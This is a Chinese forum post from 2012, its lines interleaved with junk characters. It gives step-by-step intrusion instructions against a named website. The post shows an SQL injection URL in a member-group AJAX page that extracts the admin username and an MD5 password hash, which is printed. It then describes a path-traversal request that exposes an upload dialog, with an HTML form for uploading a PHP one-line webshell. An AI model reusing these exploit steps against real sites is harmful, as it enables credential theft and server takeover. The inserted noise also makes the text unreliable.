①注入漏洞。
1 k& v/ ^8 p5 C这站 http://www.political-security.com/
. s; q( W! _" ?, \* k% {! }$ K4 F首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
9 I( h, E% T1 E. @4 O" Dwww.political-security.com/data/mysql_error_trace.inc 爆后台
, E' M) L3 U4 L* I! Z. H/ T# ?) c然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
5 ~0 r1 I: z( a0 b5 `$ _) x8 |! }4 {然后写上语句 1 s& J# Y0 s; p, ^$ n
查看管理员帐号+ S; f5 \% ^( m1 ^
http://www.political-security.co ... &membergroup=@`9 X9 F6 Z. q6 F, ~+ `0 a( x
4 \5 }" J8 z& L# l* V
admin & r P7 _; ^/ C" D4 H. Y+ T1 E
4 F2 [$ J# s+ g' ?7 A3 H3 \
查看管理员密码& E0 l3 v4 `8 S- o) F0 R* n
http://www.political-security.co ... &membergroup=@`
' g6 H" v% f8 N, P z5 W3 `, P+ u6 C$ ^ ^, Q
8d29b1ef9f8c5a5af429- S5 w9 h8 S) q, X' F
' u3 c1 I6 F A0 z% b" s: |
查看管理员密码
/ D" l+ R/ B: O, e5 E: {$ h/ ?0 J7 T7 ~: d( O
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
! m4 q; _5 r7 e; c8 R- t1 [
, e9 v3 a) I9 ]6 |* a: ~# B- T8d2
. [5 |& W/ q! ~9b1ef9f8c5a5af42
: J- L& f% }# y/ p$ A0 B- X9/ k2 x( ]/ V* E* E0 _
5 u0 H q6 Z! |& _6 J
cmd5没解出来 只好测试第二个方法8 Z( k8 K& a. V$ J0 a' r
4 z# P' t9 t! y3 J' f# w
) t' e% M" A9 _: E# e/ Q8 F" S9 i6 ^. Y
②上传漏洞:5 \4 R" h- N* a/ ^ X# H
1 E% I, {/ j& P
只要登陆会员中心,然后访问页面链接& B9 h( o: K4 P' i5 x3 M6 L
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
6 E( t2 k; X1 w
4 G( K+ ^( d. w- U3 s5 b3 A如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
- Q/ V" A @8 S- R9 h
) ~2 B4 U k' i( W3 d4 M" B6 R于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
8 d. Y- `* r/ h$ a8 |( b
; G! d; f3 O2 i! @% ]7 m<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
8 |' z# P3 f4 E( d; d, S) r6 F或者! i, H. v: d1 u6 z
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对